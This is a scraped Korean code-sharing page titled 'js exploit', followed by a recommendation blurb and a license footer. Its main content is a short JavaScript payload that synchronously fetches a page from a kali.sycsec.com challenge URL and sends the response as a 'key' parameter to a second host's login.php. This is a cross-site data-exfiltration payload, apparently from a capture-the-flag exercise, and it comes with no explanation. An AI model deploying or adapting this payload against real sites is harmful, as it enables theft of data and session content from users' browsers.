js exploit
// xhrrequest
function
createXHR () {
var
request =
false
;
if
(window.XMLHttpRequest) {
request =
new
XMLHttpRequest();
if
(request.overrideMimeType) {
request.overrideMimeType(
'text/xml'
);
}
}
else
if
(window.ActiveXObject) {
var
versions = [
'Microsoft.XMLHTTP'
,
'MSXML.XMLHTTP'
,
'Microsoft.XMLHTTP'
,
'Msxml2.XMLHTTP.7.0'
,
'Msxml2.XMLHTTP.6.0'
,
'Msxml2.XMLHTTP.5.0'
,
'Msxml2.XMLHTTP.4.0'
,
'MSXML2.XMLHTTP.3.0'
,
'MSXML2.XMLHTTP'
];
for
(
var
i = 0; i < versions.length; i++) {
try
{
request =
new
ActiveXObject(versions);
}
catch
(e) {}
}
}
return
request;
}
//get
function
get (xhr, url) {
xhr.open(
"GET"
, url,
false
);
xhr.send();
return
xhr.responseText;
}
var
xhr = createXHR();
var
x = get(xhr,
'http://kali.sycsec.com/ebcb6eb2004d1f4086ef87cdf5d678c3/'
);
get(xhr,
"http://test/login.php?key="
+escape(x));
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
다양한 언어의 JSONJSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.